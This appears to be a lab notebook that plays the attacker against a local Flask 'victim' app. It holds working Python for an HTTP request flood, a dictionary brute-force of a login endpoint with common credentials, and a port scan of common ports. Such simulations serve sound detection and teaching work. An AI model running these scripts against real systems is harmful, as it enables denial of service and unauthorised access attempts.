# Attacker Simulation Notebook (Real Network Mode)

This notebook acts as the **Attacker Machine**.
It sends **REAL** network traffic to the Victim Machine running the Flask App.

**Setup:**
1. Ensure the Flask App is running on the Victim Machine (`python app.py`).
2. Set `VICTIM_IP` below to the IP address of the Victim Machine.
   - If running locally, use `127.0.0.1`.
   - If running on a separate VM, use its LAN IP (e.g., `192.168.x.x`).

In [ ]:
import requests
import socket
import time
import random
from datetime import datetime

# CONFIGURATION
VICTIM_IP = '127.0.0.1'  # CHANGE THIS to the Victim's IP
VICTIM_PORT = 5000
BASE_URL = f'http://{VICTIM_IP}:{VICTIM_PORT}'

print(f"Targeting Victim at: {BASE_URL}")

## 1. DoS Attack Simulation
Floods the target web server with HTTP GET requests.

In [ ]:
def launch_dos_attack(count=100):
    print(f"[DoS] Flooding {BASE_URL} with {count} requests...")
    
    for i in range(count):
        try:
            # Send a real HTTP Request
            requests.get(BASE_URL)
            if i % 10 == 0:
                print(f"Sent {i} requests...")
        except Exception as e:
            print(f"Connection failed: {e}")
            break
            
    print("[DoS] Attack Completed.")

# Run Attempt
launch_dos_attack(count=60)

## 2. Brute Force Simulation
 attempts to login to the `/login` endpoint with a dictionary of passwords.

In [ ]:
def launch_brute_force():
    url = f"{BASE_URL}/login"
    print(f"[Brute Force] Attacking {url}...")
    
    usernames = ['admin', 'root', 'user']
    passwords = ['123456', 'password', 'qwerty', 'admin123']
    
    for user in usernames:
        for pwd in passwords:
            payload = {'username': user, 'password': pwd}
            try:
                response = requests.post(url, json=payload)
                print(f"Tried {user}:{pwd} -> Status: {response.status_code}")
            except Exception as e:
                print(f"Error: {e}")
            time.sleep(0.1)

    print("[Brute Force] Attack Completed.")

# Run Attempt
launch_brute_force()

## 3. Port Scan Simulation
Attempts to connect to various ports on the target machine.

In [ ]:
def launch_port_scan():
    print(f"[Port Scan] Scanning {VICTIM_IP}...")
    
    # Common ports + Flask port
    ports = [21, 22, 80, 443, 8080, 5000]
    
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((VICTIM_IP, port))
        
        status = "OPEN" if result == 0 else "CLOSED"
        print(f"Port {port}: {status}")
        sock.close()
        
    print("[Port Scan] Completed.")

# Run Attempt
launch_port_scan()